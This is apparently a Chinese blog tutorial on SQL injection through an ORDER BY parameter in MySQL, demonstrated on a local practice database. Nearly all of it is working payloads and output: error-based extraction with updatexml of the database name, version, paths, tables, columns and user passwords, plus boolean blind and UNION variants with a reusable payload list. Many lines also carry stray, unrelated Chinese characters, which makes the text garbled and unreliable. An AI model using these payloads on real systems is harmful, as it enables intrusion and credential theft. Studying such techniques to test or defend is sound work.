今天總結(jié)一下注入點(diǎn)在order by排序注入蹬竖，學(xué)習(xí)一下記錄下這個(gè)過程
聲明：此文謹(jǐn)供學(xué)習(xí)記錄研究使用，切勿用于非法用途币厕，否則后果自負(fù)！

注入方法介紹

當(dāng)頁面出現(xiàn)mysql報(bào)錯(cuò)信息時(shí)劈榨，注入點(diǎn)在 order by后面晦嵌，此時(shí)可以利用報(bào)錯(cuò)信息進(jìn)行注入。

• 正常語句

mysql> select * from users order by id;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)

mysql> select * from users order by id desc;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
| 14 | admin4   | admin4     |
| 12 | dhakkan  | dumbo      |
| 11 | admin3   | admin3     |
| 10 | admin2   | admin2     |
|  9 | admin1   | admin1     |
|  8 | admin    | admin      |
|  7 | batman   | mob!le     |
|  6 | superman | genious    |
|  5 | stupid   | stupidity  |
|  4 | secure   | crappy     |
|  3 | Dummy    | p@ssword   |
|  2 | Angelina | I-kill-you |
|  1 | Dumb     | Dumb       |
+----+----------+------------+
13 rows in set (0.00 sec)

mysql>

其中select * from users order by id desc;的desc是可控的傳參值惭载。

order by 與報(bào)錯(cuò)注入

• 下面進(jìn)行報(bào)錯(cuò)注入
  • 首先獲取基本一些基本信息總結(jié)

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select database())),0));
ERROR 1105 (HY000): XPATH syntax error: '~security'        //獲取當(dāng)前數(shù)據(jù)庫
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select version())),0));         
ERROR 1105 (HY000): XPATH syntax error: '~5.5.53'      //獲取數(shù)據(jù)庫版本
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select user())),0));        
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'     //獲取用戶
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select @@datadir)),0));
ERROR 1105 (HY000): XPATH syntax error: '~E:\soft\phpmystudy\MySQL\data\'        //獲取數(shù)據(jù)庫路徑
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select @@version_compile_os)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Win32'      //獲取操作系統(tǒng)
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select @@basedir)),0));
ERROR 1105 (HY000): XPATH syntax error: '~E:/soft/phpmystudy/MySQL/'       //mysql安裝路徑
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select session_user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'      //獲取連接數(shù)據(jù)庫的用戶名
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select current_user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'      //獲取當(dāng)前用戶名
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select system_user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'        //獲取系統(tǒng)用戶名
mysql>

圖片.png

• 獲取數(shù)據(jù)信息

獲取數(shù)據(jù)庫個(gè)數(shù)

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));
ERROR 1105 (HY000): XPATH syntax error: '~11'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(schema_name) from information_schema.schemata)),0));
ERROR 1105 (HY000): XPATH syntax error: '~11'
mysql>

注：count(*)是對(duì)結(jié)果函數(shù)統(tǒng)計(jì)描滔，而count(schema_name)則是對(duì)不為空的行數(shù)結(jié)果進(jìn)行統(tǒng)計(jì)

獲取數(shù)據(jù)庫列表信息

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~information_schema'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~challenges'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 2,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~dvwa'
mysql>

注： 這里使用limit逐條獲取，為什么這樣呢券腔？因?yàn)槲野l(fā)現(xiàn)使用group_concat()批量查詢輸出結(jié)果長(zhǎng)度有限制，因此需要這樣一條一條獲取了拘泞，當(dāng)然數(shù)據(jù)多的時(shí)候就要簡(jiǎn)單寫個(gè)python腳本跑了

• 獲取某數(shù)據(jù)庫表信息

獲取表個(gè)數(shù)
payload:

and(updatexml(1,concat(0x7e,(select count(*) from information_schema.tables where table_schema = "數(shù)據(jù)庫名")),0))

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~4'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~4'
mysql>

獲取表名
payload:

and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = "數(shù)據(jù)庫名")),0))

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~emails,referers,uagents,users'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~emails'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~referers'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 2,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~uagents'
mysql>

• 獲取某數(shù)據(jù)庫中某個(gè)表字段信息

字段個(gè)數(shù)
payload:

and (updatexml(1,concat(0x7e,(select count(*) from information_schema.columns where table_schema = "數(shù)據(jù)庫名" and table_name = "表名")),0))

mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select count(*) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~3'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select count(column_name) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~3'
mysql>

獲取字段名纷纫，字段多的需要單條獲取
payload:

and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = "數(shù)據(jù)庫名" and table_name = "表名")),0))

mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~id,username,password'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = "security" and table_name = "users" limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~id'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = "security" and table_name = "users" limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~username'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = "security" and table_name = "users" limit 2,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~password'
mysql>

• 最后獲取想要的信息就簡(jiǎn)單了

mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select username,password from users limit 0,1)),0));
ERROR 1241 (21000): Operand should contain 1 column(s)
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select username from users limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Dumb'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select password from users limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Dumb'
mysql>

經(jīng)測(cè)試，貌似只能指定獲取一個(gè)字段信息

order by 與盲注

當(dāng)頁面沒有展示MYSQL的錯(cuò)誤信息時(shí)陪腌，且只能根據(jù)頁面回顯的狀態(tài)進(jìn)行判斷時(shí)辱魁，可以使用布爾盲注

• 簡(jiǎn)單看兩條語句

mysql> select * from users order by id ^(select(select version()) regexp '^aaaa');
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)

mysql> select * from users order by id ^(select(select version()) regexp '^5');
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  3 | Dummy    | p@ssword   |
|  2 | Angelina | I-kill-you |
|  5 | stupid   | stupidity  |
|  4 | secure   | crappy     |
|  7 | batman   | mob!le     |
|  6 | superman | genious    |
|  9 | admin1   | admin1     |
|  8 | admin    | admin      |
| 11 | admin3   | admin3     |
| 10 | admin2   | admin2     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)

mysql>

圖片.png

簡(jiǎn)單解釋一下就是在regexp正則匹配的時(shí)候烟瞧，如果匹配到數(shù)據(jù)返回1(00000001)的時(shí)候，此時(shí)的1會(huì)和id中的數(shù)據(jù)的二進(jìn)制進(jìn)行異或染簇，按照異或的結(jié)果進(jìn)行升序排列参滴，所以顯示的排列會(huì)發(fā)生變化；反之當(dāng)進(jìn)行正則匹配的時(shí)候锻弓，未匹配到數(shù)據(jù)返回0(00000000)砾赔，此時(shí)數(shù)字和0異或的結(jié)果還是本身，所以顯示的排列不會(huì)發(fā)生改變青灼。

總結(jié)：當(dāng)頁面排序紊亂時(shí)則說明正則匹配到正確數(shù)據(jù)过蹂，頁面排序未發(fā)生紊亂時(shí)則說明正則沒有匹配到數(shù)據(jù)

通過以上可以判斷數(shù)據(jù)庫版本在5以上，這里的'^5'也可以轉(zhuǎn)換成^5的十六進(jìn)制聚至。

order by 與 union 聯(lián)合查詢

• 當(dāng) $query = "select * from users order by id $input ";沒有使用括號(hào)包裹的時(shí)候酷勺，是無法直接使用union查詢的。

• 當(dāng) $query = "(select * from users order by id $input) ";使用括號(hào)進(jìn)行包裹的時(shí)候扳躬，此時(shí)是可以進(jìn)行union查詢的脆诉。

• 獲取版本號(hào)

mysql> (select * from users order by id ) union(select 1,(version()),3);
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
|  1 | 5.5.53   | 3          |
+----+----------+------------+
14 rows in set (0.00 sec)

mysql>

圖片.png

• 其他就不一一截圖了,查詢語句格式如下：

(select * from users order by id ) union(select 1,(payload),3);

數(shù)據(jù)庫信息payload:

database()               //獲取當(dāng)前數(shù)據(jù)庫
version()                //獲取數(shù)據(jù)庫版本
user()                   //獲取用戶
@@datadir                //獲取數(shù)據(jù)庫路徑
@@version_compile_os     //獲取操作系統(tǒng)
@@basedir                //mysql安裝路徑
session_user()           //獲取連接數(shù)據(jù)庫的用戶名
current_user()           //獲取當(dāng)前用戶名
system_user()            //獲取系統(tǒng)用戶名

表信息payload: 同上，不再重復(fù)贷币！

參考：
https://www.freebuf.com/column/145988.html

https://www.anquanke.com/post/id/158674